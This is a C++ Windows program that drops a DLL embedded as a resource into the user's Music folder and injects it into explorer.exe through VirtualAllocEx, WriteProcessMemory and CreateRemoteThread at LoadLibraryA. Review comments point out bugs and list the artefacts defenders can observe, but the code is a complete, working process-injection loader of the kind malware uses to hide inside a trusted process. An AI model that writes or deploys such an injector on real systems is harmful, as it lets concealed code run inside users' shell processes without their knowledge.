#include<Windows.h>
#include<atlstr.h>
#include<TlHelp32.h>
#include<Psapi.h>
#include <Shlobj.h>
#include<mciapi.h>
#include"resource.h"
#pragma comment (lib, "winmm.lib")
#pragma warning(disable:4996)
#pragma comment (lib,"Psapi.lib")
#include"vol.h"
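class InputStream
{
public:
	// Borrowed pointer to the locked resource bytes. The stream does not own
	// this memory and never frees it (see the destructor).
	void*filestream;
	// Total number of bytes behind filestream; filled in by getResourceAsStream.
	int len;
	// Current read offset into filestream.
	int pos;

	/* Copy up to len_t bytes from the current offset into bt.
	 *
	 * Returns the number of bytes copied, 0 when len_t <= 0, or -1 once the
	 * stream is exhausted (pos >= len) -- the sentinel callers loop on.
	 * The first len_t bytes of bt are zeroed before copying, so the unread
	 * tail of the buffer is defined after a short read. bt must hold at
	 * least len_t bytes; that is the caller's responsibility.
	 *
	 * Fix vs. the previous version: a call with len_t <= 0 used to advance
	 * pos by one without reading anything, silently skipping a byte. */
	int read(byte *bt, int len_t)
	{
		if (this->pos >= this->len)
			return -1;
		for (int i = 0; i < len_t; i++)
			bt[i] = 0;
		if (len_t <= 0)
			return 0;
		int remaining = this->len - this->pos;
		int count = len_t < remaining ? len_t : remaining;
		const byte *src = (const byte *)this->filestream + this->pos;
		for (int i = 0; i < count; i++)
			bt[i] = src[i];
		// pos now lands exactly on len after the final chunk rather than on
		// len + 1; the end-of-stream test above treats both the same.
		this->pos += count;
		return count;
	}

	/* Releases the resource lock. NOTE(review): UnlockResource is documented
	 * by Microsoft as obsolete/no-op on 32- and 64-bit Windows, so this is
	 * effectively a formality; the resource memory itself is never freed. */
	~InputStream()
	{
		UnlockResource(this->filestream);
	}

	// Intentionally empty debugging hook (the original printf is commented out).
	void debug()
	{
		//printf("debug %d\n", this->len);
	}
};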
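/* Wrap the "DATA" resource with integer id ID from module hModule in a
 * heap-allocated InputStream. The caller owns the returned object and must
 * delete it.
 *
 * Never returns NULL. If FindResource, LoadResource or LockResource fails,
 * the stream is returned with filestream == NULL and len == 0, so the first
 * read() reports end of stream instead of dereferencing a NULL pointer
 * (the previous version stored whatever the failed calls returned). */
InputStream * getResourceAsStream(int ID, HMODULE hModule)
{
	InputStream *is = new InputStream;
	is->filestream = NULL;
	is->len = 0;
	is->pos = 0;

	HRSRC hResource = FindResource(hModule, MAKEINTRESOURCE(ID), "DATA");
	if (hResource == NULL)
		return is;
	HGLOBAL hLoadedResource = LoadResource(hModule, hResource);
	if (hLoadedResource == NULL)
		return is;
	LPVOID pResourceData = LockResource(hLoadedResource);
	if (pResourceData == NULL)
		return is;

	is->filestream = pResourceData;
	// SizeofResource yields a DWORD; the stream stores an int as before.
	is->len = (int)SizeofResource(hModule, hResource);
	return is;
}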
/* Return the PID of the first snapshot entry whose executable name is
 * exactly "explorer.exe", or 0 if none is found.
 *
 * Review notes (code left as-is):
 *  - the snapshot handle `help` is never closed, and neither is any
 *    `process_handle` opened in the loop, so handles leak on every call;
 *  - Process32Next is called before the entry filled by Process32First is
 *    examined, so the first snapshot entry is never compared;
 *  - the OpenProcess/GetModuleFileNameEx pair fills `path` and then discards
 *    it (dead code) while requesting PROCESS_ALL_ACCESS on every process in
 *    the system; the return values of CreateToolhelp32Snapshot and
 *    OpenProcess are not checked. */
DWORD findPid()
{
HANDLE help = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // never closed
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
BOOL ret = Process32First(help, &pe32);
while (ret)
{
ret = Process32Next(help, &pe32); // skips the entry from Process32First
if (!ret)
break;
if (!strcmp(pe32.szExeFile, "explorer.exe")) // case-sensitive match
{
return pe32.th32ProcessID;
}
HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS/* all access rights */, FALSE, pe32.th32ProcessID); // leaked
char path[MAX_PATH + 1];
GetModuleFileNameEx(process_handle, NULL, path, MAX_PATH + 1); // result unused
}
return 0;
}
/* Program entry point.
 *
 * Writes the embedded "DATA" resource IDR_DATA1 to <My Music>\dd.dll, then
 * loads that file into the explorer.exe process found by findPid(): it
 * allocates memory in the target, writes the DLL path there and starts a
 * remote thread whose start address is LoadLibraryA. Returns 0 on every
 * path; failures are reported only through a MessageBox.
 *
 * Review notes (code left as-is):
 *  - the return values of SHGetSpecialFolderPath, fopen and fwrite are not
 *    checked; a NULL `fp` makes the fwrite loop crash;
 *  - strcat into the fixed 255-byte `path` is unbounded;
 *  - the handles `openp` and `ok` are never closed, and h.GetBuffer() is
 *    never paired with ReleaseBuffer();
 *  - GetLastError() returns a DWORD but every sprintf formats it with %d.
 *
 * From a defender's point of view each step is an observable event:
 * a DLL dropped in the user's Music folder, a PROCESS_ALL_ACCESS handle to
 * explorer.exe, an RWX (PAGE_EXECUTE_READWRITE) allocation in another
 * process, a cross-process memory write, and a remote thread started at
 * LoadLibraryA. */
int WINAPI WinMain(HINSTANCE h1, HINSTANCE h2, LPSTR cmd, int show)
{
char path[255];
SHGetSpecialFolderPath(
NULL, // reserved
path, // receives the folder path
CSIDL_MYMUSIC, // CSIDL constant for the user's Music folder
FALSE // do not create the folder if it does not exist
);
strcat(path, "\\dd.dll"); // unbounded append into the 255-byte buffer
HMODULE md = GetModuleHandle(NULL);
InputStream *file = getResourceAsStream(IDR_DATA1, md);
FILE *fp = fopen(path, "wb"); // unchecked; NULL is passed straight to fwrite
unsigned char reader[1024];
int len = 0;
// read() returns -1 at end of stream; fwrite's count is not checked.
while ((len = file->read(reader, 1024)) != -1)
{
fwrite(reader, 1, len, fp);
}
delete file;
fclose(fp);
CString h=path; // the DLL path that will be handed to LoadLibraryA in the target
char error[200];
DWORD PID = findPid();
if (PID == 0)
{
return 0;
}
HANDLE openp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); // unchecked and never closed
LPVOID addr = VirtualAllocEx(openp, NULL/* let the system choose the address */, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);// allocate memory in the target process
if (addr == NULL)
{
sprintf(error, "申请内存失败!\n错误码:%d", GetLastError()); // DWORD printed with %d
MessageBox(0,error, "错误", 16); // 16 == MB_ICONERROR
return 0;
}
// Copies the path plus its NUL terminator; GetBuffer() is not released afterwards.
if (WriteProcessMemory(openp, addr, h.GetBuffer(), h.GetLength() + 1, NULL) == FALSE)
{
sprintf(error, "写入失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
// The LoadLibrary handle is never freed; the address is taken from this process
// and relies on kernel32 mapping at the same address in the target.
LPTHREAD_START_ROUTINE startaddr = (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
if (startaddr == NULL)
{
sprintf(error, "起始点定位失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
HANDLE ok = CreateRemoteThread(openp, NULL, 0, startaddr, addr, 0, NULL); // thread handle never closed
if (ok == NULL)
{
sprintf(error, "创建远程线程失败!\n错误码:%d", GetLastError());
MessageBox(0,error, "错误", 16);
return 0;
}
MessageBox(0,"成功", "", 0);
return 0;
}
C++将DLL插入到explorer.exe并运行